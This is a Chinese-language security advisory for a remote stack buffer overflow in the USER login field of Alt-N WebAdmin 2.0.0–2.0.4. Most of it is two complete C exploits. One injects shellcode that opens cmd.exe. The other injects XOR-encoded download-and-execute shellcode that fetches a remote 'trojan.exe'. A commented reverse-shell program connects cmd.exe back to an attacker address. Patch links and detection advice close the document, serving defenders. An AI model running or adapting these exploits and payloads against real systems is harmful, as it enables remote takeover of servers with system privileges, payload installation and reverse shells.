Alt-N WebAdmin USER参数远程缓冲区溢出漏洞
发布时间:2003-06-24 更新时间:2003-06-25
严重程度:高 威胁程度:远程管理员权限(服务以 LocalSystem 身份运行) 错误类型:边界检查错误 利用方式:服务器模式
BUGTRAQ ID:8029
受影响系统 Alt-N WebAdmin 2.0.0 - 2.0.4
不受影响系统 Alt-N WebAdmin 2.0.5
详细描述 WebAdmin允许管理员安全地在线管理MDaemon、RelayFax和WorldClient。 在处理登录表单的USER参数时存在一个溢出问题。默认webadmin.exe进程以系统服务(LocalSystem)身份运行,由于对用户提交的USER参数缺少长度检查,超长用户名可触发栈溢出(返回地址被覆盖),精心构造的用户数据可以以该服务进程的权限执行任意代码。由于溢出发生在登录表单(POST /WebAdmin.dll?View=Logon)的处理过程中,攻击者无需任何有效凭据。
测试代码
/* WebAdmin.dll remote proof of concept 2.0.4 version.. tried finding 2.0.5 but all
versions were already patched from the dl sites... this was tested on a win2ksp2 server,
i suggest using better shellcode this is just something i know works, just opens a cmd.exe
prompt on the victim box. I imagine this won't be too much harder to exploit with 2.0.5
unpatched this took me about 1 hour to write and it was my first remote win32 exploit,
thank you alt-n :D. word to Mark Litchfield for finding this, i suggest anyone who is
interested in learning win32 exploitation download this and attempt to exploit it, it's
easier than you think. shouts to innercircle you little kittens you....
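-wire */
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ws2_32")   /* original was missing the comma */

/*
 * Payload for WebAdmin 2.0.4 on Windows 2000 SP2.  Per the author's own
 * annotations it builds "msvcrt" on the stack, calls LoadLibraryA on it, then
 * builds "cmd.exe" and calls system() on that.  Both absolute addresses
 * (LoadLibraryA in kernel32 at 0x77e8a254, system() in msvcrt at 0x78019b4a)
 * are specific to that service pack, so the payload is not portable across
 * Windows builds.  Bytes are reproduced exactly as published.
 */
char sc[] =
    "\x55"                  /* push ebp */
    "\x8b\xec"              /* mov ebp, esp */
    "\x53"                  /* push ebx */
    "\x56"                  /* push esi */
    "\x57"                  /* push edi */
    "\x8b\xe5"              /* mov esp, ebp */
    "\x55"                  /* push ebp */
    "\x8b\xec"              /* mov ebp, esp */
    "\x33\xff"              /* xor edi,edi */
    "\x57"                  /* push edi */
    "\x57"                  /* push edi */
    "\xc6\x45\xf8\x6d"      /* mov byte ptr ss:[ebp-8],6d  'm' */
    "\xc6\x45\xf9\x73"      /* mov byte ptr ss:[ebp-7],73  's' */
    "\xc6\x45\xfa\x76"      /* mov byte ptr ss:[ebp-6],76  'v' */
    "\xc6\x45\xfb\x63"      /* mov byte ptr ss:[ebp-5],63  'c' */
    "\xc6\x45\xfc\x72"      /* mov byte ptr ss:[ebp-4],72  'r' */
    "\xc6\x45\xfd\x74"      /* mov byte ptr ss:[ebp-3],74  't' */
    "\xb8\x54\xa2\xe8\x77"  /* mov eax,kernel32.loadlibraryA */
    "\x50"                  /* push eax */
    "\x8d\x45\xf8"          /* lea eax, dword ptr ss:[ebp-8] */
    "\x50"                  /* push eax */
    "\xff\x55\xf4"          /* call dword ptr ss:[ebp-c] */
    "\x58"                  /* pop eax */
    "\x58"                  /* pop eax */
    "\x58"                  /* pop eax */
    "\x33\xc0"              /* xor eax,eax */
    "\x50"                  /* push eax */
    "\x50"                  /* push eax */
    "\xc6\x45\xf8\x63"      /* mov byte ptr ss:[ebp-8],63  'c' */
    "\xc6\x45\xf9\x6d"      /* mov byte ptr ss:[ebp-7],6d  'm' */
    "\xc6\x45\xfa\x64"      /* mov byte ptr ss:[ebp-6],64  'd' */
    "\xc6\x45\xfb\x2e"      /* mov byte ptr ss:[ebp-5],2e  '.' */
    "\xc6\x45\xfc\x65"      /* mov byte ptr ss:[ebp-4],65  'e' */
    "\xc6\x45\xfd\x78"      /* mov byte ptr ss:[ebp-3],78  'x' */
    "\xc6\x45\xfe\x65"      /* mov byte ptr ss:[ebp-2],65  'e' */
    "\xb8\x4a\x9B\x01\x78"  /* mov eax, 78019b4a ; system() from msvcrt win2ksp2 */
    "\x50"                  /* push eax */
    "\x8d\x45\xf8"          /* lea eax, dword ptr ss:[ebp-8] */
    "\x50"                  /* push eax */
    "\xff\x55\xf4"          /* call dword ptr ss:[ebp-c] */
    "\x83\xc4\x04"          /* add esp, 04h */
    "\x5c"                  /* pop esp */
    "\xc3";                 /* ret - we're done! */

/* Target address; filled in by main(), kept global as in the original. */
struct sockaddr_in victim;

/*
 * Usage: <victim> <port>
 *
 * Builds a single POST to /WebAdmin.dll?View=Logon whose User= form field is:
 *   168 bytes of NOP (0x90) padding, the 4-byte return address (a jmp esp in
 *   WebAdmin.dll 2.0.4), the payload above, then the remaining form fields.
 * The 168-byte offset is presumably the distance the author measured to the
 * saved return address; nothing here verifies it.  The request is sent once
 * and the program exits; it does not wait for a reply.
 *
 * Fixes relative to the published version: the #pragma was malformed, the
 * terminator was written at exp_buf[x+1] instead of exp_buf[x], WSAStartup /
 * socket / connect / send results were never checked, and the socket and
 * winsock state were never released.
 */
int main(int argc, char **argv)
{
    SOCKET s;
    WSADATA wsadata;
    int x;
    int port;
    DWORD jmpesp = 0x1005d58d;   /* jmp esp from 2.0.4 webAdmin.dll */
    char exp_buf[5000];
    /* Request headers up to and including the start of the form body.
     * NOTE: "Content-Length: 395" is the author's fixed value and is not the
     * length of the body assembled below; it is kept as-is because the
     * published exploit worked with it. */
    char boom[] =
        "POST /WebAdmin.dll?View=Logon HTTP/1.1\r\n"
        "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"
        "Accept-Language: en-us\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "User-Agent: Your Mom\r\n"
        "Host: sh0dan.org\r\n"
        "Content-Length: 395\r\n"
        "Connection: Keep-Alive\r\n"
        "Cache-Control: no-cache\r\n"
        "Cookie: User=test; Lang=en; Theme=Standard\r\n\r\nUser=";
    char o_args[] = "&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In\r\n\r\n";

    if (argc != 3) {
        fprintf(stderr, "WebAdmin from Alt-N 2.0.4 Remote Exploit Proof Of Concept\n");
        fprintf(stderr, "Werd to Mark Litchfield for finding this easily exploited hole\n");
        fprintf(stderr, "Usage: %s <victim> <port>\n", argv[0]);
        exit(1);
    }

    port = atoi(argv[2]);
    if (port < 1 || port > 65535) {
        fprintf(stderr, "bad port: %s\n", argv[2]);
        exit(1);
    }

    if (WSAStartup(MAKEWORD(2, 0), &wsadata) != 0) {
        fprintf(stderr, "WSAStartup failed\n");
        exit(1);
    }

    victim.sin_family = AF_INET;
    victim.sin_port = htons((u_short)port);
    victim.sin_addr.s_addr = inet_addr(argv[1]);
    if (victim.sin_addr.s_addr == INADDR_NONE) {
        fprintf(stderr, "bad victim address (dotted quad expected): %s\n", argv[1]);
        WSACleanup();
        exit(1);
    }

    /* Every byte not explicitly written below stays a NOP. */
    memset(exp_buf, 0x90, sizeof exp_buf);
    x = (int)strlen(boom);
    memcpy(exp_buf, boom, x);
    x += 168;                                  /* NOP sled up to the return address */
    memcpy(exp_buf + x, &jmpesp, sizeof jmpesp);
    x += (int)sizeof jmpesp;
    memcpy(exp_buf + x, sc, strlen(sc));
    x += (int)strlen(sc);
    memcpy(exp_buf + x, o_args, strlen(o_args));
    x += (int)strlen(o_args);
    exp_buf[x] = '\0';                         /* terminate at x, not x+1 */

    s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
    if (s == INVALID_SOCKET) {
        fprintf(stderr, "socket creation failed\n");
        WSACleanup();
        exit(1);
    }
    if (connect(s, (struct sockaddr *)&victim, sizeof victim) == SOCKET_ERROR) {
        fprintf(stderr, "error couldn't connect\n");
        closesocket(s);
        WSACleanup();
        exit(1);
    }
    if (send(s, exp_buf, x, 0) != x) {
        fprintf(stderr, "send failed or was short\n");
        closesocket(s);
        WSACleanup();
        exit(1);
    }

    printf("booyah");
    closesocket(s);
    WSACleanup();
    return 0;
}

---------------------------------------------------------------------------

/* WebAdmin.dll remote download exec shellcode. Works on 2.0.3 and 2.0.4 all
windows sp's. Oh and my previous exploit, i'm an idiot and 2.0.5 *is* the
patch, heh. This shellcode was used by ThreaT in his vulnreg.reg exploit, it
works quite nicely. Look at the bottom of the code for some trojan.exe idea's.
That one i found somewhere but i can't remember. shellcode has one minor suck
point, it shows a window on the target host, oh and the exploit crashes the
server, so make a user account and restart the service.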
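Be Kind. word to Mark Litchfield for finding this, i suggest anyone who is
interested in learning win32 exploitation download this and attempt to exploit
it, it's easier than you think. don't download directly from alt-n, they
patched all of their 'archived' versions. heh. shouts to innercircle you little
kittens you....

-wire */
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* The MSVC CRT of the day only provides _snprintf.  Unlike C99 snprintf it does
 * not NUL-terminate when the output is truncated; main() zero-fills exp_buf
 * before calling it so the result is still a string either way. */
#define snprintf _snprintf
#pragma comment(lib, "ws2_32")

/*
 * ThreaT's download-and-execute payload (see header).  Layout: 32 NOP bytes,
 * a short decoder stub, then the encoded body.  The stub reads as: push a
 * tiny "pop esi / push esi / ret" onto the stack and call it to learn its own
 * address, add 0x0e to reach the encoded bytes, then loop
 * lodsb / xor al,0x99 / stosb until the decoded byte is zero.  That is why
 * main() XORs the download URL with 0x99 before appending it and terminates it
 * with an encoded NUL ("\x99").  The encoded body itself is opaque here and is
 * reproduced byte-for-byte.
 *
 * Sized 700 so main() can strncat up to 100 URL bytes plus the terminator onto
 * the ~302 bytes initialised here.
 */
char sc[700] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x68\x5E\x56\xC3\x90\x8B\xCC\xFF\xD1\x83\xC6\x0E\x90\x8B\xFE\xAC"
    "\x34\x99\xAA\x84\xC0\x75\xF8"   /* download and exec ala ThreaT vulnreg exploit. */
    "\x72\xeb\xf3\xa9\xc2\xfd\x12\x9a\x12\xd9\x95\x12\xd1\x95\x12\x58\x12\xc5\xbd\x91"
    "\x12\xe9\xa9\x9a\xed\xbd\x9d\xa1\x87\xec\xd5\x12\xd9\x81\x12\xc1\xa5\x9a\x41\x12"
    "\xc2\xe1\x9a\x41\x12\xea\x85\x9a\x69\xcf\x12\xea\xbd\x9a\x69\xcf\x12\xca\xb9\x9a"
    "\x49\x12\xc2\x81\xd2\x12\xad\x03\x9a\x69\x9a\xed\xbd\x8d\x12\xaf\xa2\xed\xbd\x81"
    "\xed\x93\xd2\xba\x42\xec\x73\xc1\xc1\xaa\x59\x5a\xc6\xaa\x50\xff\x12\x95\xc6\xc6"
    "\x12\xa5\x16\x14\x9d\x9e\x5a\x12\x81\x12\x5a\xa2\x58\xec\x04\x5a\x72\xe5\xaa\x42"
    "\xf1\xe0\xdc\xe1\xd8\xf3\x93\xf3\xd2\xca\x71\xe2\x66\x66\x66\xaa\x50\xc8\xf1\xec"
    "\xeb\xf5\xf4\xff\x5e\xdd\xbd\x9d\xf6\xf7\x12\x75\xc8\xc8\xcc\x66\x49\xf1\xf0\xf5"
    "\xfc\xd8\xf3\x97\xf3\xeb\xf3\x9b\x71\xcc\x66\x66\x66\xaa\x42\xca\xf1\xf8\xb7\xfc"
    "\xe1\x5f\xdd\xbd\x9d\xfc\x12\x55\xca\xca\xc8\x66\xec\x81\xca\x66\x49\xaa\x42\xf1"
    "\xf0\xf7\xdc\xe1\xf3\x98\xf3\xd2\xca\x71\xb5\x66\x66\x66\x14\xd5\xbd\x89\xf3\x98"
    "\xc8\x66\x49\xaa\x42\xf1\xe1\xf0\xed\xc9\xf3\x98\xf3\xd2\xca\x71\x8b\x66\x66\x66"
    "\x66\x49\x71\xe6\x66\x66\x66";

/* Target address; filled in by main(), kept global as in the original. */
struct sockaddr_in victim;

/*
 * Usage: <victim> <port> <url> <version>   (version 3 or 4 picks the jmp esp)
 *
 * Request layout: headers, a Content-Length line, "User=", 168 NOP bytes, the
 * 4-byte jmp esp address for the chosen WebAdmin.dll build, sc (decoder +
 * payload + XORed URL), then the remaining form fields.  As in the original,
 * the 168-byte offset is presumably the author's measured distance to the
 * saved return address.  Sends once and exits without reading a reply.
 *
 * Fixes relative to the published version: the version argument is validated
 * before anything is built, a URL longer than the 100 bytes strncat would
 * silently truncate is rejected instead, the size_t passed to "%d" is cast,
 * the terminator is written at exp_buf[x] instead of exp_buf[x+1], winsock
 * calls are checked, and the socket/winsock state is released on every path.
 */
int main(int argc, char **argv)
{
    SOCKET s;
    WSADATA wsadata;
    int x;
    int port;
    size_t i, urllen;
    DWORD jmpesp4 = 0x1005d58d;   /* jmp esp from 2.0.4 webAdmin.dll */
    DWORD jmpesp3 = 0x10071c43;   /* jmp esp from 2.0.3 webAdmin.dll */
    DWORD jmpesp;
    char exp_buf[5000];
    char post[] =
        "POST /WebAdmin.dll?View=Logon HTTP/1.1\r\n"
        "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"
        "Accept-Language: en-us\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "User-Agent: Your Mom\r\n"
        "Host: sh0dan.org\r\n";
    char rest[] =
        "Connection: Keep-Alive\r\n"
        "Cache-Control: no-cache\r\n"
        "Cookie: User=test; Lang=en; Theme=Standard\r\n\r\nUser=";
    char o_args[] = "&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In\r\n\r\n";

    if (argc != 5) {
        fprintf(stderr, "WebAdmin from Alt-N remote LocalSystem exploit.\n");
        fprintf(stderr, "Werd to Mark Litchfield for finding this easily exploited hole\n");
        fprintf(stderr, "supports version 2.0.3 and 2.0.4 on any sp.\n");
        fprintf(stderr, "Usage: %s <victim> <port> <url> <version> where version is 3 or 4\n", argv[0]);
        fprintf(stderr, "Ex: %s 192.168.0.1 1000 http://heh.com/trojan.exe 4\n", argv[0]);
        exit(1);
    }

    /* Validate inputs before touching sc or the network. */
    if (atoi(argv[4]) == 4) {
        jmpesp = jmpesp4;
    } else if (atoi(argv[4]) == 3) {
        jmpesp = jmpesp3;
    } else {
        fprintf(stderr, "uhm unknown version, try 3 or 4\n");
        exit(1);
    }

    port = atoi(argv[2]);
    if (port < 1 || port > 65535) {
        fprintf(stderr, "bad port: %s\n", argv[2]);
        exit(1);
    }

    urllen = strlen(argv[3]);
    if (urllen > 100) {
        fprintf(stderr, "url longer than 100 bytes would be silently truncated; refusing\n");
        exit(1);
    }

    /* Encode the URL the way the decoder stub expects: each byte ^ 0x99,
     * then an encoded NUL so the decoder loop stops after it. */
    for (i = 0; i < urllen; i++)
        argv[3][i] ^= 0x99;
    strncat(sc, argv[3], 100);
    strncat(sc, "\x99", 1);

    if (WSAStartup(MAKEWORD(2, 0), &wsadata) != 0) {
        fprintf(stderr, "WSAStartup failed\n");
        exit(1);
    }

    victim.sin_family = AF_INET;
    victim.sin_port = htons((u_short)port);
    victim.sin_addr.s_addr = inet_addr(argv[1]);
    if (victim.sin_addr.s_addr == INADDR_NONE) {
        fprintf(stderr, "bad victim address (dotted quad expected): %s\n", argv[1]);
        WSACleanup();
        exit(1);
    }

    /* Zero-fill so the (_snprintf) output is NUL-terminated even if truncated. */
    memset(exp_buf, 0x00, sizeof exp_buf);
    /* NOTE: the declared Content-Length is the author's formula.  It counts
     * the bytes of `rest` (which are headers) and omits the return address
     * and o_args, so it is not the real body length; kept as-is because the
     * published exploit worked with it. */
    snprintf(exp_buf, 2000, "%sContent-Length: %d\r\n%s",
             post, (int)(strlen(sc) + strlen(rest) + 168), rest);
    x = (int)strlen(exp_buf);
    memset(exp_buf + x, 0x90, 168);            /* NOP sled up to the return address */
    x += 168;
    memcpy(exp_buf + x, &jmpesp, sizeof jmpesp);
    x += (int)sizeof jmpesp;
    memcpy(exp_buf + x, sc, strlen(sc));
    x += (int)strlen(sc);
    memcpy(exp_buf + x, o_args, strlen(o_args));
    x += (int)strlen(o_args);
    exp_buf[x] = '\0';                         /* terminate at x, not x+1 */

    s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
    if (s == INVALID_SOCKET) {
        fprintf(stderr, "socket creation failed\n");
        WSACleanup();
        exit(1);
    }
    if (connect(s, (struct sockaddr *)&victim, sizeof victim) == SOCKET_ERROR) {
        fprintf(stderr, "error couldn't connect\n");
        closesocket(s);
        WSACleanup();
        exit(1);
    }
    if (send(s, exp_buf, x, 0) != x) {
        fprintf(stderr, "send failed or was short\n");
        closesocket(s);
        WSACleanup();
        exit(1);
    }

    printf("sent!\n");
    closesocket(s);
    WSACleanup();
    return 0;
}

/* ripped from somewhere, sorry i forget where i got this.

   NOTE(review): kept verbatim as the author's "trojan.exe" idea.  It is a
   reverse shell that connects back to PORT on IP and hands the socket to
   cmd.exe as its standard handles.  As written it does not build or work as
   intended: IP is a #define but inet_addr("IP") passes the literal string
   "IP", `true` is undeclared in C without <stdbool.h> (TRUE would do), `void
   main` is non-standard, and the connect() result is never checked.

#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")
#define PORT 53
#define IP 192.168.0.21

void main(int argc, char *argv[])
{
    WSADATA wsaData;
    SOCKET hSocket;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    struct sockaddr_in adik_sin;

    memset(&adik_sin,0,sizeof(adik_sin));
    memset(&si,0,sizeof(si));
    WSAStartup(MAKEWORD(2,0),&wsaData);
    hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
    adik_sin.sin_family = AF_INET;
    adik_sin.sin_port = htons(PORT);
    adik_sin.sin_addr.s_addr = inet_addr("IP");
    connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES;
    si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
    CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi);
    ExitProcess(0);
}
*/

解决方案
升级程序:
Alt-N WebAdmin 2.0.0: Alt-N Upgrade WebAdmin 2.05 ftp://ftp.altn.com/WebAdmin/Release/wa205_en.exe
Alt-N WebAdmin 2.0.1: Alt-N Upgrade WebAdmin 2.05 ftp://ftp.altn.com/WebAdmin/Release/wa205_en.exe
Alt-N WebAdmin 2.0.2: Alt-N Upgrade WebAdmin 2.05 ftp://ftp.altn.com/WebAdmin/Release/wa205_en.exe
Alt-N WebAdmin 2.0.3: Alt-N Upgrade WebAdmin 2.05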
ftp://ftp.altn.com/WebAdmin/Release/wa205_en.exe
Alt-N WebAdmin 2.0.4: Alt-N Upgrade WebAdmin 2.05 ftp://ftp.altn.com/WebAdmin/Release/wa205_en.exe
临时缓解: 在升级到 2.0.5 之前,建议通过防火墙将 WebAdmin 的监听端口限制为仅允许可信管理主机访问,不要将其直接暴露在互联网上。另据测试代码作者所述,利用过程会导致 webadmin 服务崩溃,因此服务异常终止、以及登录请求(POST /WebAdmin.dll?View=Logon)中异常超长的 User 字段,均可作为排查是否遭受攻击的线索。
相关信息 参考:http://www.securityfocus.com/archive/1/326501